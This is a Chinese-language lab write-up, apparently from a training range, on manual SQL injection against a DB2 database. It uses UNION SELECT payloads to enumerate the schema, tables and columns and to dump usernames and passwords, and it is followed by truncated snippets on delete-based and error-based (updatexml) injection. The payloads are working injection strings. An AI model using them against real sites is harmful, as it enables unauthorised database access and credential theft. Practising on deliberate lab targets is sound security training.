進入環境,用order by測試,發現可以,並測試到字段為4
接下來用union select 1,2,3,4 發現失敗
後來上網看了別人的思路是union select 1,2,3,4 from sysibm.systables就可以回顯了
應該是不同的資料庫語法問題
爆庫 id=2 union select 1,2,current schema,4 from sysibm.sysdummy1 ,注意db2是對大小寫敏感
sysibm.sysdummy1表是乙個記憶體的特殊表(按照oracle的術語,習慣稱之為「偽表」),常用於訪問db2中的暫存器,從而返回特定需要內容,類同於臨時表
可以用來返回當前實時資訊:
例如:'select current date from sysibm.sysdummy1' 命令返回當前系統日期
'select 1+1 from sysibm.sysdummy1' 執行數**算
'select nextval for myseq from sysibm.sysdummy1' 得到序列值
好了,繼續主題,爆表id=2 union select 1,2,tabname,4 from syscat.tables where tabschema=current schema limit 0,1
爆欄位, id=2 union select 1,2,column_name,4 from sysibm.columns where table_schema=current schema and table_name='game_character' limit 0,1
爆字段值 id=2 union select 1,name,password,4 from game_character limit 1,1
墨者 SQL注入漏洞測試 delete注入
測試注入 嘗試order by 失敗 測試and,頁面正常回顯 試著用報錯注入,and updatexml 1,concat 0x7e,select database 0x7e 1 發現有注入點,資料庫是pikaqiu 在這裡提醒大家不要用id 61 65進行注入,構造乙個不存在的最好 如博主用的是...
墨者靶場 初級 SQL過濾字元後手工注入漏洞測試
安全工程師 墨者 最近在練習sql手工注入漏洞,自己剛搭建好乙個靶場環境apache php mysql,php 對客戶端提交的引數做了些許過濾。來感受過濾過後的sql手工注入吧。1 掌握sql注入原理 2 了解手工注入的方法 3 了解字串的url加解密 4 了解sql注入常用注釋字元 5 了解sq...
墨者 SQL注入漏洞測試 報錯盲注
根據題意,用updatexml構造報錯回顯 and updatexml 1,concat 0x7e,select user 0x7e 1 爆庫 and updatexml 1,concat 0x7e,select database 0x7e 1 爆表 and updatexml 1,concat 0...